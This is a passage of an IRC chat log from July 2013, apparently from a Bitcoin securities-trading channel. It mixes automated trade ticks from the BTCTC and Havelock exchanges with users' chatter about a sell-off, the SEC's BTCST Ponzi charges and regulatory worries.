= 0.0885 BTC [+] Jul 24 23:07:24 every share of fb is a bet against google, i wouldn't take that bet Jul 24 23:07:53 16% Jul 24 23:08:12 Facebook has probably already peaked imo. Jul 24 23:08:21 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 24 23:08:24 [HAVELOCK] [AM100] 1 @ 0.04425 BTC [+] Jul 24 23:08:26 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 24 23:08:28 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 24 23:08:31 [BTCTC] [ASICMINER-PT] 8 @ 4.591 = 36.728 BTC [-] Jul 24 23:08:56 [BTCTC] [ASICMINER-PT] 3 @ 4.591 = 13.773 BTC [-] Jul 24 23:09:03 [BTCTC] [ASICMINER-PT] 1 @ 4.591 BTC [-] Jul 24 23:09:07 [BTCTC] [ASICMINER-PT] 13 @ 4.59 = 59.67 BTC [-] Jul 24 23:09:09 [BTCTC] [ASICMINER-PT] 2 @ 4.58982 = 9.1796 BTC [-] Jul 24 23:10:01 [BTCTC] [ASICMINER-PT] 1 @ 4.556 BTC [-] Jul 24 23:10:34 [BTCTC] [AMC-PT] 37 @ 0.003251 = 0.1203 BTC [-] Jul 24 23:10:36 [BTCTC] [AMC-PT] 75 @ 0.00325 = 0.2438 BTC [-] Jul 24 23:10:39 [BTCTC] [AMC-PT] 12 @ 0.003231 = 0.0388 BTC [-] Jul 24 23:10:41 [BTCTC] [AMC-PT] 25 @ 0.00323 = 0.0808 BTC [-] Jul 24 23:10:43 [BTCTC] [AMC-PT] 25 @ 0.003222 = 0.0806 BTC [-] Jul 24 23:10:45 [BTCTC] [AMC-PT] 106 @ 0.00322 = 0.3413 BTC [-] Jul 24 23:11:19 [BTCTC] [ASICMINER-PT] 1 @ 4.59 BTC [+] Jul 24 23:11:31 [BTCTC] [AMC-PT] 1 @ 0.0033 BTC [+] Jul 24 23:11:33 [BTCTC] [AMC-PT] 34 @ 0.0033 = 0.1122 BTC [+] Jul 24 23:11:57 [BTCTC] [COGNITIVE] 2 @ 0.49 = 0.98 BTC [-] Jul 24 23:12:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.0455 = 0.091 BTC [+] Jul 24 23:12:45 [BTCTC] [AMC-PT] 47 @ 0.003221 = 0.1514 BTC [-] Jul 24 23:12:47 [BTCTC] [AMC-PT] 94 @ 0.00322 = 0.3027 BTC [-] Jul 24 23:13:00 [BTCTC] [AMC-PT] 1 @ 0.003299 BTC [+] Jul 24 23:13:05 i think so Jul 24 23:13:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.0438 = 0.219 BTC [-] Jul 24 23:13:33 [BTCTC] [TAT.ASICMINER] 23 @ 0.0438 = 1.0074 BTC [-] Jul 24 23:13:34 [HAVELOCK] [AM100] 4 @ 0.0442 = 0.1768 BTC [-] Jul 24 23:13:36 [HAVELOCK] [AM100] 72 @ 0.0442 = 3.1824 BTC [-] Jul 24 23:13:39 [HAVELOCK] [AM100] 2 @ 0.04405 = 0.0881 BTC [-] Jul 24 23:14:51 I think it's a short now, it'll probably reopen tommorow right under $30, like 29.74 or something. Jul 24 23:15:14 XRP has lost over half its value the past few weeks eh? Jul 24 23:15:18 Maybe a few 25p Jul 24 23:15:39 [HAVELOCK] [SDSTM] 1 @ 0.01085 BTC [+] Jul 24 23:15:52 [BTCTC] [COGNITIVE] 5 @ 0.5 = 2.5 BTC [+] Jul 24 23:16:05 XRP is flawed by design Jul 24 23:16:18 [HAVELOCK] [AM100] 2 @ 0.0439 = 0.0878 BTC [-] Jul 24 23:16:35 [BTCTC] [DMS.MINING] 46 @ 0.013 = 0.598 BTC [+] Jul 24 23:16:37 [HAVELOCK] [AM100] 7 @ 0.0439 = 0.3073 BTC [-] Jul 24 23:16:51 [BTCTC] [BASIC-MINING] 4 @ 0.4 = 1.6 BTC [+] Jul 24 23:16:54 [BTCTC] [AMC-PT] 1795 @ 0.00327 = 5.8697 BTC [-] Jul 24 23:16:56 [BTCTC] [AMC-PT] 1205 @ 0.003298 = 3.9741 BTC [+] Jul 24 23:17:09 [BTCTC] [DMS.SELLING] 1 @ 0.0183 BTC [-] Jul 24 23:17:11 [BTCTC] [DMS.SELLING] 1 @ 0.0181 BTC [-] Jul 24 23:17:13 [BTCTC] [DMS.MINING] 47 @ 0.0125 = 0.5875 BTC [-] Jul 24 23:17:31 [HAVELOCK] [AM100] 1 @ 0.0439 BTC [-] Jul 24 23:17:47 [BTCTC] [AMC-PT] 152 @ 0.003297 = 0.5011 BTC [-] Jul 24 23:17:49 [BTCTC] [AMC-PT] 848 @ 0.003298 = 2.7967 BTC [+] Jul 24 23:18:01 [BTCTC] [AMC-PT] 1447 @ 0.003298 = 4.7722 BTC [+] Jul 24 23:18:38 [BTCTC] [BASIC-MINING] 1 @ 0.4525 BTC [+] Jul 24 23:19:25 [BTCTC] [AMC-PT] 14 @ 0.003423 = 0.0479 BTC [+] Jul 24 23:19:49 [BTCTC] [BASIC-MINING] 1 @ 0.4525 BTC [+] Jul 24 23:20:49 [HAVELOCK] [AM100] 18 @ 0.0438999 = 0.7902 BTC [-] Jul 24 23:20:50 [BTCTC] [LTC-ATF.B2] 10 @ 0.01001 = 0.1001 BTC [+] Jul 24 23:20:50 [BTCTC] [LTC-ATF.B2] 40 @ 0.010001 = 0.4 BTC [-] Jul 24 23:20:59 [BTCTC] [AMC-PT] 6 @ 0.003423 = 0.0205 BTC [+] Jul 24 23:21:22 [BTCTC] [DMS.SELLING] 49 @ 0.01997 = 0.9785 BTC [+] Jul 24 23:21:39 [BTCTC] [AMC-PT] 6 @ 0.003424 = 0.0205 BTC [+] Jul 24 23:22:21 [HAVELOCK] [SDSTM] 1 @ 0.01085 BTC [+] Jul 24 23:22:31 [BTCTC] [COGNITIVE] 1 @ 0.601 BTC [+] Jul 24 23:22:56 XRP has lost over half its value the past few weeks eh? << what value ? Jul 24 23:22:58 [BTCTC] [AMC-PT] 6 @ 0.003424 = 0.0205 BTC [+] Jul 24 23:23:00 [BTCTC] [AMC-PT] 50 @ 0.003424 = 0.1712 BTC [+] Jul 24 23:23:05 [HAVELOCK] [SMG] 65 @ 0.00026999 = 0.0175 BTC [+] Jul 24 23:23:18 [HAVELOCK] [SMG] 12 @ 0.00026999 = 0.0032 BTC [+] Jul 24 23:23:56 [BTCTC] [AMC-PT] 9 @ 0.003499 = 0.0315 BTC [+] Jul 24 23:24:25 [BTCTC] [TAT.ASICMINER] 51 @ 0.0438 = 2.2338 BTC [-] Jul 24 23:24:33 indeed Jul 24 23:24:40 [BTCTC] [AMC-PT] 115 @ 0.0035 = 0.4025 BTC [+] Jul 24 23:24:49 [BTCTC] [BFMINES] 2 @ 0.004 = 0.008 BTC [+] Jul 24 23:24:49 market value Jul 24 23:24:56 a that. yea. Jul 24 23:24:59 [HAVELOCK] [AM100] 1 @ 0.0438999 BTC [-] Jul 24 23:25:10 [BTCTC] [TAT.ASICMINER] 26 @ 0.0438 = 1.1388 BTC [-] Jul 24 23:25:11 [HAVELOCK] [SDSTM] 3 @ 0.01084 = 0.0325 BTC [-] Jul 24 23:25:14 [BTCTC] [TAT.ASICMINER] 22 @ 0.0438 = 0.9636 BTC [-] Jul 24 23:26:20 [BTCTC] [BFMINES] 6 @ 0.004 = 0.024 BTC [+] Jul 24 23:26:56 [BTCTC] [AMC-PT] 100 @ 0.003212 = 0.3212 BTC [-] Jul 24 23:27:04 [BTCTC] [AMC-PT] 25 @ 0.003212 = 0.0803 BTC [-] Jul 24 23:27:05 [HAVELOCK] [AM100] 12 @ 0.0438998 = 0.5268 BTC [-] Jul 24 23:27:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.0449 = 0.1796 BTC [+] Jul 24 23:28:13 [BTCTC] [AMC-PT] 90 @ 0.003211 = 0.289 BTC [-] Jul 24 23:28:52 [BTCTC] [AMC-PT] 10 @ 0.003211 = 0.0321 BTC [-] Jul 24 23:28:54 [BTCTC] [AMC-PT] 100 @ 0.00321 = 0.321 BTC [-] Jul 24 23:29:01 [BTCTC] [AMC-PT] 300 @ 0.003202 = 0.9606 BTC [-] Jul 24 23:29:01 [BTCTC] [AMC-PT] 50 @ 0.003201 = 0.1601 BTC [-] Jul 24 23:29:01 [BTCTC] [AMC-PT] 1000 @ 0.003201 = 3.201 BTC [-] Jul 24 23:29:01 [BTCTC] [AMC-PT] 635 @ 0.003201 = 2.0326 BTC [-] Jul 24 23:29:46 [HAVELOCK] [SDSTM] 3 @ 0.01085 = 0.0326 BTC [+] Jul 24 23:32:14 Someone is making bank right now Jul 24 23:32:49 !ticker btctc amc-pt Jul 24 23:32:51 [BTCT:AMC-PT] 1D: 0.003201 / 0.00361 / 0.00395 (147481 shares, 531.8 BTC), 7D: 0.00231 / 0.00276 / 0.004749 (3160977 shares, 8712.3 BTC), 30D: 0.00099 / 0.0026 / 0.1 (4934724 shares, 12842.6 BTC) Jul 24 23:33:03 what's this, the day of scam's reckoning ? Jul 24 23:33:22 [BTCTC] [DMS.MINING] 44 @ 0.0125 = 0.55 BTC [-] Jul 24 23:33:24 [BTCTC] [DMS.MINING] 15 @ 0.0125 = 0.1875 BTC [-] Jul 24 23:33:55 [BTCTC] [AMC-PT] 339 @ 0.003216 = 1.0902 BTC [+] Jul 24 23:34:27 [BTCTC] [AMC-PT] 25 @ 0.003218 = 0.0805 BTC [+] Jul 24 23:34:42 [HAVELOCK] [SDSTM] 20 @ 0.01085 = 0.217 BTC [+] Jul 24 23:34:45 [BTCTC] [AMC-PT] 69 @ 0.003216 = 0.2219 BTC [-] Jul 24 23:34:46 [BTCTC] [AMC-PT] 314 @ 0.003215 = 1.0095 BTC [-] Jul 24 23:34:48 [BTCTC] [AMC-PT] 25 @ 0.003215 = 0.0804 BTC [-] Jul 24 23:35:11 [BTCTC] [AMC-PT] 200 @ 0.003213 = 0.6426 BTC [-] Jul 24 23:35:13 [BTCTC] [AMC-PT] 10 @ 0.003212 = 0.0321 BTC [-] Jul 24 23:35:14 [BTCTC] [AMC-PT] 21 @ 0.003212 = 0.0675 BTC [-] Jul 24 23:35:24 [HAVELOCK] [AM100] 3 @ 0.0438998 = 0.1317 BTC [-] Jul 24 23:35:56 [HAVELOCK] [SMG] 23 @ 0.00026999 = 0.0062 BTC [+] Jul 24 23:36:13 [HAVELOCK] [SMG] 1 @ 0.00027 BTC [+] Jul 24 23:36:24 [BTCTC] [BASIC-MINING] 2 @ 0.3802 = 0.7604 BTC [-] Jul 24 23:36:33 [HAVELOCK] [AM100] 1 @ 0.0438998 BTC [-] Jul 24 23:36:56 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [+] Jul 24 23:37:09 [HAVELOCK] [AM100] 1 @ 0.0438998 BTC [-] Jul 24 23:37:19 [BTCTC] [COGNITIVE] 1 @ 0.63 BTC [+] Jul 24 23:37:21 [BTCTC] [COGNITIVE] 1 @ 0.64 BTC [+] Jul 24 23:37:23 [BTCTC] [COGNITIVE] 1 @ 0.64 BTC [+] Jul 24 23:38:53 [BTCTC] [AMC-PT] 70 @ 0.003424 = 0.2397 BTC [+] Jul 24 23:40:49 [BTCTC] [AMC-PT] 1 @ 0.00342 BTC [-] Jul 24 23:41:27 [HAVELOCK] [SMG] 100 @ 0.00027 = 0.027 BTC [+] Jul 24 23:41:38 [HAVELOCK] [SMG] 200 @ 0.00027 = 0.054 BTC [+] Jul 24 23:41:46 [BTCTC] [AMC-PT] 4 @ 0.003213 = 0.0129 BTC [-] Jul 24 23:41:48 [BTCTC] [AMC-PT] 9 @ 0.003212 = 0.0289 BTC [-] Jul 24 23:41:52 [BTCTC] [AMC-PT] 250 @ 0.003208 = 0.802 BTC [-] Jul 24 23:41:59 [BTCTC] [AMC-PT] 225 @ 0.003206 = 0.7214 BTC [-] Jul 24 23:41:59 [BTCTC] [AMC-PT] 450 @ 0.003205 = 1.4423 BTC [-] Jul 24 23:41:59 [BTCTC] [AMC-PT] 647 @ 0.003202 = 2.0717 BTC [-] Jul 24 23:42:06 [BTCTC] [AMC-PT] 1865 @ 0.003201 = 5.9699 BTC [-] Jul 24 23:42:11 [BTCTC] [AMC-PT] 732 @ 0.0032 = 2.3424 BTC [-] Jul 24 23:42:13 [BTCTC] [TAT.MINIGAME] 7 @ 0.000261 = 0.0018 BTC [-] Jul 24 23:42:14 [BTCTC] [S.MPOE-PT] 2 @ 0.000934 = 0.0019 BTC [+] Jul 24 23:42:30 [HAVELOCK] [SMG] 380 @ 0.00026999 = 0.1026 BTC [-] Jul 24 23:42:32 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 24 23:42:59 [HAVELOCK] [SMG] 90 @ 0.00027 = 0.0243 BTC [+] Jul 24 23:43:02 [BTCTC] [TAT.ASICMINER] 12 @ 0.0449 = 0.5388 BTC [+] Jul 24 23:43:04 [BTCTC] [TAT.ASICMINER] 20 @ 0.0455 = 0.91 BTC [+] Jul 24 23:43:10 [BTCTC] [TAT.ASICMINER] 6 @ 0.04599 = 0.2759 BTC [+] Jul 24 23:43:18 [HAVELOCK] [SDSTM] 2 @ 0.01084 = 0.0217 BTC [-] Jul 24 23:43:21 [BTCTC] [AMC-PT] 700 @ 0.0033 = 2.31 BTC [+] Jul 24 23:43:23 [BTCTC] [AMC-PT] 3268 @ 0.0032 = 10.4576 BTC [-] Jul 24 23:43:43 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 24 23:44:40 [BTCTC] [ASICMINER-PT] 1 @ 4.558 BTC [-] Jul 24 23:45:40 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00301 = 0.0301 BTC [-] Jul 24 23:45:56 [BTCTC] [ASICMINER-PT] 10 @ 4.557 = 45.57 BTC [-] Jul 24 23:46:55 [BTCTC] [ASICMINER-PT] 1 @ 4.555 BTC [-] Jul 24 23:46:55 [BTCTC] [ASICMINER-PT] 10 @ 4.555 = 45.55 BTC [-] Jul 24 23:47:20 [BTCTC] [AMC-PT] 1032 @ 0.0032 = 3.3024 BTC [-] Jul 24 23:48:11 [BTCTC] [DMS.MINING] 5 @ 0.0135 = 0.0675 BTC [+] Jul 24 23:48:13 [BTCTC] [DMS.MINING] 50 @ 0.01397 = 0.6985 BTC [+] Jul 24 23:48:15 [BTCTC] [DMS.MINING] 42 @ 0.01397 = 0.5867 BTC [+] Jul 24 23:48:16 [BTCTC] [DMS.MINING] 30 @ 0.01398 = 0.4194 BTC [+] Jul 24 23:48:22 a burnside post just trigged chaos Jul 24 23:48:53 [BTCTC] [DMS.MINING] 10 @ 0.014 = 0.14 BTC [+] Jul 24 23:49:10 jeez Jul 24 23:49:16 Costing me huge right now Jul 24 23:50:01 [BTCTC] [KENILWORTH] 1000 @ 0.0018 = 1.8 BTC [-] Jul 24 23:50:06 well at least he didn't just up and leave, nefario style. Jul 24 23:50:08 we need a p2p decentralized exchange system Jul 24 23:50:20 with a public ledger Jul 24 23:50:40 either a new blockchain, or piggyback on existing Jul 24 23:50:54 [HAVELOCK] [AM100] 1 @ 0.0432 BTC [-] Jul 24 23:50:54 [HAVELOCK] [AM100] 1 @ 0.0431 BTC [-] Jul 24 23:50:57 so where is this post Jul 24 23:50:57 [HAVELOCK] [AM100] 5 @ 0.0431 = 0.2155 BTC [-] Jul 24 23:50:59 [HAVELOCK] [AM100] 5 @ 0.043 = 0.215 BTC [-] Jul 24 23:51:01 ;;google why i nixed Jul 24 23:51:01 [HAVELOCK] [AM100] 1 @ 0.043 BTC [-] Jul 24 23:51:02 Why I Nixed the Knicks | Observer: ; nixed - definition of nixed by the Free Online Dictionary, Thesaurus ...: ; Kristen Wiig on 'Girl Most Likely' and Why She Nixed 'Bridesmaids 2 ...: [HAVELOCK] [AM100] 5 @ 0.043 = 0.215 BTC [-] Jul 24 23:51:05 hm. Jul 24 23:51:07 [HAVELOCK] [AM100] 1 @ 0.0429 BTC [-] Jul 24 23:51:07 [HAVELOCK] [AM100] 185 @ 0.04280001 = 7.918 BTC [-] Jul 24 23:51:09 [HAVELOCK] [AM100] 75 @ 0.04280001 = 3.21 BTC [-] Jul 24 23:51:11 [HAVELOCK] [AM100] 5 @ 0.0427 = 0.2135 BTC [-] Jul 24 23:51:12 [HAVELOCK] [AM100] 17 @ 0.0427 = 0.7259 BTC [-] Jul 24 23:51:14 He didnt even say he was changing anything for sure Jul 24 23:51:15 gecko_x2 http://trilema.com/2013/why-i-nixed-p2p-colored-coins-and-all-that-jazz/ Jul 24 23:51:15 [HAVELOCK] [AM100] 87 @ 0.042672 = 3.7125 BTC [-] Jul 24 23:51:16 [HAVELOCK] [AM100] 1 @ 0.0425 BTC [-] Jul 24 23:51:18 [HAVELOCK] [AM100] 5 @ 0.0425 = 0.2125 BTC [-] Jul 24 23:51:21 [HAVELOCK] [AM100] 3 @ 0.0425 = 0.1275 BTC [-] Jul 24 23:51:22 [HAVELOCK] [AM100] 5 @ 0.0423 = 0.2115 BTC [-] Jul 24 23:51:24 [HAVELOCK] [AM100] 6 @ 0.0422 = 0.2532 BTC [-] Jul 24 23:51:27 [HAVELOCK] [AM100] 5 @ 0.0421 = 0.2105 BTC [-] Jul 24 23:51:28 [HAVELOCK] [AM100] 2 @ 0.042 = 0.084 BTC [-] Jul 24 23:51:30 [HAVELOCK] [AM100] 13 @ 0.042 = 0.546 BTC [-] Jul 24 23:51:30 people just inducing panic Jul 24 23:51:31 [HAVELOCK] [AM100] 400 @ 0.04190002 = 16.76 BTC [-] Jul 24 23:51:31 complete chaos lol Jul 24 23:51:33 [HAVELOCK] [AM100] 72 @ 0.04190001 = 3.0168 BTC [-] Jul 24 23:52:01 ThickAsThieves the joys of getting a bunch of mommentum traders alone in a room. Jul 24 23:52:14 [HAVELOCK] [AM100] 9 @ 0.04389978 = 0.3951 BTC [+] Jul 24 23:52:23 [BTCTC] [BMF] 6 @ 0.03399 = 0.2039 BTC [+] Jul 24 23:53:07 plus, how is a selloff the answer, when you can export to direct shares, or to a canadian exchange Jul 24 23:53:25 https://bitcointalk.org/index.php?topic=261235.msg2793174#msg2793174 Jul 24 23:53:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0468 BTC [+] Jul 24 23:53:45 SEC Charges Bitcoin Savings and Trust (BTCST) as Ponzi Scheme Jul 24 23:54:10 [BTCTC] [AMC-PT] 3 @ 0.003185 = 0.0096 BTC [-] Jul 24 23:54:13 [BTCTC] [AMC-PT] 7 @ 0.003184 = 0.0223 BTC [-] Jul 24 23:54:15 [BTCTC] [AMC-PT] 52 @ 0.003183 = 0.1655 BTC [-] Jul 24 23:54:26 [BTCTC] [AMC-PT] 70 @ 0.003181 = 0.2227 BTC [-] Jul 24 23:54:28 [BTCTC] [AMC-PT] 25 @ 0.003162 = 0.0791 BTC [-] Jul 24 23:54:30 [BTCTC] [AMC-PT] 750 @ 0.003161 = 2.3708 BTC [-] Jul 24 23:54:35 [BTCTC] [AMC-PT] 96 @ 0.00316 = 0.3034 BTC [-] Jul 24 23:54:36 [BTCTC] [AMC-PT] 358 @ 0.00315 = 1.1277 BTC [-] Jul 24 23:54:45 [BTCTC] [ASICMINER-PT] 1 @ 4.554 BTC [-] Jul 24 23:55:06 [BTCTC] [AMC-PT] 23 @ 0.003163 = 0.0727 BTC [+] Jul 24 23:55:08 [BTCTC] [AMC-PT] 642 @ 0.00315 = 2.0223 BTC [-] Jul 24 23:55:10 [BTCTC] [AMC-PT] 330 @ 0.00312 = 1.0296 BTC [-] Jul 24 23:55:11 [BTCTC] [AMC-PT] 1 @ 0.0031 BTC [-] Jul 24 23:55:13 [BTCTC] [AMC-PT] 250 @ 0.00305 = 0.7625 BTC [-] Jul 24 23:55:15 [BTCTC] [AMC-PT] 1977 @ 0.003021 = 5.9725 BTC [-] Jul 24 23:55:32 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.003005 = 0.0391 BTC [-] Jul 24 23:55:52 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003004 = 0.03 BTC [-] Jul 24 23:55:53 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003003 = 0.015 BTC [-] Jul 24 23:55:58 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.003001 = 0.054 BTC [-] Jul 24 23:56:10 [BTCTC] [AMC-PT] 20 @ 0.003397 = 0.0679 BTC [+] Jul 24 23:56:13 [BTCTC] [TAT.ASICMINER] 67 @ 0.04376 = 2.9319 BTC [-] Jul 24 23:56:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.04375 = 0.0875 BTC [-] Jul 24 23:56:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003001 = 0.03 BTC [-] Jul 24 23:56:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.0437 = 0.2185 BTC [-] Jul 24 23:56:27 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.003 = 0.027 BTC [-] Jul 24 23:56:50 [BTCTC] [AMC-PT] 25 @ 0.003022 = 0.0756 BTC [-] Jul 24 23:56:50 [BTCTC] [AMC-PT] 23 @ 0.003021 = 0.0695 BTC [-] Jul 24 23:56:52 [BTCTC] [AMC-PT] 7 @ 0.003021 = 0.0211 BTC [-] Jul 24 23:56:54 [BTCTC] [AMC-PT] 500 @ 0.00302 = 1.51 BTC [-] Jul 24 23:56:55 [BTCTC] [AMC-PT] 750 @ 0.003005 = 2.2538 BTC [-] Jul 24 23:56:57 [BTCTC] [AMC-PT] 200 @ 0.003005 = 0.601 BTC [-] Jul 24 23:56:58 [BTCTC] [ASICMINER-PT] 2 @ 4.52 = 9.04 BTC [-] Jul 24 23:56:58 man Jul 24 23:56:59 [BTCTC] [AMC-PT] 50 @ 0.003005 = 0.1503 BTC [-] Jul 24 23:57:01 [BTCTC] [AMC-PT] 1000 @ 0.003003 = 3.003 BTC [-] Jul 24 23:57:03 [BTCTC] [AMC-PT] 1000 @ 0.003003 = 3.003 BTC [-] Jul 24 23:57:04 [BTCTC] [AMC-PT] 4445 @ 0.003002 = 13.3439 BTC [-] Jul 24 23:57:17 whoa-man Jul 24 23:57:20 basically burnside is an idiot now Jul 24 23:57:31 [BTCTC] [KENILWORTH] 20 @ 0.0018 = 0.036 BTC [-] Jul 24 23:57:47 yeah Jul 24 23:57:52 [BTCTC] [AMC-PT] 208 @ 0.00303 = 0.6302 BTC [+] Jul 24 23:57:53 [BTCTC] [KENILWORTH] 10 @ 0.0018 = 0.018 BTC [-] Jul 24 23:57:55 [BTCTC] [AMC-PT] 3042 @ 0.003002 = 9.1321 BTC [-] Jul 24 23:57:57 [HAVELOCK] [AM100] 1 @ 0.0425 BTC [-] Jul 24 23:58:00 i'm not paying attention Jul 24 23:58:01 he's speaking like a lawyer, but saying how he currently has no counsel Jul 24 23:58:04 what's going on Jul 24 23:58:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.045 = 0.09 BTC [+] Jul 24 23:58:27 who are we talking about? Jul 24 23:58:34 how far up do i need to read to understand what Jul 24 23:58:42 like 30secs Jul 24 23:58:49 oh, burnside, I see Jul 24 23:58:50 [BTCTC] [ASICMINER-PT] 6 @ 4.52 = 27.12 BTC [-] Jul 24 23:58:51 [BTCTC] [ASICMINER-PT] 1 @ 4.511 BTC [-] Jul 24 23:58:51 [BTCTC] [ASICMINER-PT] 1 @ 4.511 BTC [-] Jul 24 23:58:54 [BTCTC] [ASICMINER-PT] 1 @ 4.510022 BTC [-] Jul 24 23:58:57 [BTCTC] [ASICMINER-PT] 1 @ 4.51001 BTC [-] Jul 24 23:59:00 [BTCTC] [ASICMINER-PT] 2 @ 4.51 = 9.02 BTC [-] Jul 24 23:59:06 https://bitcointalk.org/index.php?topic=261235.msg2793174#msg2793174 Jul 24 23:59:07 should we be worried about btct assets? Jul 24 23:59:12 SEC Charges Bitcoin Savings and Trust (BTCST) as Ponzi Scheme Jul 24 23:59:14 [BTCTC] [TAT.MINIGAME] 10 @ 0.00027 = 0.0027 BTC [+] Jul 24 23:59:50 I wonder if I can transfer my amc to bitfunder Jul 25 00:00:13 bakewell transfered from btct to bitfunder just fine Jul 25 00:00:17 and then he did a runner Jul 25 00:01:25 [HAVELOCK] [AM100] 1 @ 0.0425 BTC [-] Jul 25 00:01:48 [HAVELOCK] [AM100] 3 @ 0.0425 = 0.1275 BTC [-] Jul 25 00:02:29 [HAVELOCK] [AM100] 2 @ 0.0425 = 0.085 BTC [-] Jul 25 00:02:32 [BTCTC] [DMS.PURCHASE] 1 @ 0.0333 BTC [-] Jul 25 00:02:34 [BTCTC] [DMS.PURCHASE] 3 @ 0.0332 = 0.0996 BTC [-] Jul 25 00:02:36 [BTCTC] [DMS.PURCHASE] 1 @ 0.03311 BTC [-] Jul 25 00:02:37 [BTCTC] [DMS.PURCHASE] 50 @ 0.0331 = 1.655 BTC [-] Jul 25 00:02:41 [BTCTC] [DMS.PURCHASE] 1 @ 0.03309 BTC [-] Jul 25 00:02:42 [BTCTC] [DMS.PURCHASE] 1 @ 0.033 BTC [-] Jul 25 00:03:28 [BTCTC] [TAT.ASICMINER] 24 @ 0.0437 = 1.0488 BTC [-] Jul 25 00:03:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.0437 = 0.0874 BTC [-] Jul 25 00:03:34 [BTCTC] [TAT.ASICMINER] 25 @ 0.0435 = 1.0875 BTC [-] Jul 25 00:03:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.0435 = 0.435 BTC [-] Jul 25 00:03:57 meh Jul 25 00:03:57 [HAVELOCK] [AM100] 2 @ 0.0425 = 0.085 BTC [-] Jul 25 00:04:37 Bitfunder is in no diff situation than BTCT Jul 25 00:04:45 afaik Jul 25 00:04:51 Havelock is in Canada Jul 25 00:05:09 so if you wanna indulge in that the SEC is on witch hun Jul 25 00:05:10 t Jul 25 00:05:18 go there I guess Jul 25 00:05:25 but if these platform close you (TAT) plan to continue Jul 25 00:05:30 right? Jul 25 00:05:30 I think I'm good Jul 25 00:05:39 because you have a list or something Jul 25 00:05:42 [HAVELOCK] [AM100] 8 @ 0.0425 = 0.34 BTC [-] Jul 25 00:05:43 [BTCTC] [TAT.ASICMINER] 4 @ 0.0459 = 0.1836 BTC [+] Jul 25 00:06:15 I have legal working on it, and so far, total shutdown is not even being considered Jul 25 00:06:35 The Canadian govt , to my knowledge, has taken a very hands off approach to bitcoin Jul 25 00:06:40 [BTCTC] [DMS.PURCHASE] 390 @ 0.03166 = 12.3474 BTC [-] Jul 25 00:06:50 waiting for the yanks to make it illegal Jul 25 00:06:54 cool cool Jul 25 00:07:09 fkn US Jul 25 00:07:20 i don't really have much trust in any platform or site when the shit hits the fan Jul 25 00:07:33 Facebook up 20% now, whew. Jul 25 00:07:34 the person behind the asset is more of my concern Jul 25 00:07:43 [HAVELOCK] [AM100] 30 @ 0.04249 = 1.2747 BTC [-] Jul 25 00:07:57 o <- asset issuers asshole now Jul 25 00:08:10 in the end, the line in the sand is "who is willing to go to jail for Bitcoin". Jul 25 00:08:14 like adolphin? Jul 25 00:08:33 people that aren't basically just stick around for the ride. Jul 25 00:08:53 bitcoin/one's business Jul 25 00:08:57 no. bitcoin. Jul 25 00:09:01 [BTCTC] [DMS.SELLING] 1 @ 0.01998 BTC [+] Jul 25 00:09:09 you know my grandfather emailed me today about pirate Jul 25 00:09:13 government x thinks it may do y ? no, it may not. no matter what. Jul 25 00:09:17 he heard about it on foxbusiness or something Jul 25 00:09:42 jcpham obviously. not like he'd hear about mpex on foxbusiness or something. Jul 25 00:09:54 why should the news report what matters when there's all the stupid shit to yammer all day about. Jul 25 00:09:54 [BTCTC] [AMC-PT] 4000 @ 0.00312 = 12.48 BTC [+] Jul 25 00:10:01 right? Jul 25 00:10:13 let's not be positive, let's promote the worst Jul 25 00:10:14 yeh Jul 25 00:10:49 [BTCTC] [AMC-PT] 58 @ 0.00312 = 0.181 BTC [+] Jul 25 00:10:49 [BTCTC] [AMC-PT] 10 @ 0.00305 = 0.0305 BTC [-] Jul 25 00:10:51 there's mpex, has been worth > 500k btc for a year +_ Jul 25 00:10:51 [BTCTC] [AMC-PT] 5 @ 0.003008 = 0.015 BTC [-] Jul 25 00:10:52 [BTCTC] [AMC-PT] 25 @ 0.003007 = 0.0752 BTC [-] Jul 25 00:10:53 wences lemon wallet thing is running tv ads Jul 25 00:10:54 [BTCTC] [AMC-PT] 75 @ 0.003007 = 0.2255 BTC [-] Jul 25 00:10:56 in america Jul 25 00:10:57 asicminer hasd been over 1mn for months Jul 25 00:11:01 [BTCTC] [AMC-PT] 1577 @ 0.003002 = 4.7342 BTC [-] Jul 25 00:11:02 i've seen them on several station now Jul 25 00:11:03 they report on some douche stealing 150k Jul 25 00:11:09 150k dollars i mean. Jul 25 00:11:38 then they want to know why their advertising is drying up. well... Jul 25 00:11:55 seeing a bitcoin wallet app advertised during primetime cable tv is odd Jul 25 00:12:03 but neat Jul 25 00:12:42 mircea_popescu: are you going to add more stocks to MPEx? Jul 25 00:12:56 PeterL_ just as soon as there's more to add. Jul 25 00:13:02 [BTCTC] [S.MPOE-PT] 2 @ 0.000934 = 0.0019 BTC [+] Jul 25 00:13:23 [HAVELOCK] [AM100] 296 @ 0.0425 = 12.58 BTC [+] Jul 25 00:14:04 [BTCTC] [COGNITIVE] 1 @ 0.53 BTC [-] Jul 25 00:16:23 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [+] Jul 25 00:16:59 [BTCTC] [AMC-PT] 163 @ 0.0033 = 0.5379 BTC [+] Jul 25 00:17:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0459 BTC [+] Jul 25 00:17:33 [BTCTC] [BTC-BOND] 20 @ 0.009999 = 0.2 BTC [+] Jul 25 00:17:57 [BTCTC] [TAT.ASICMINER] 19 @ 0.04345 = 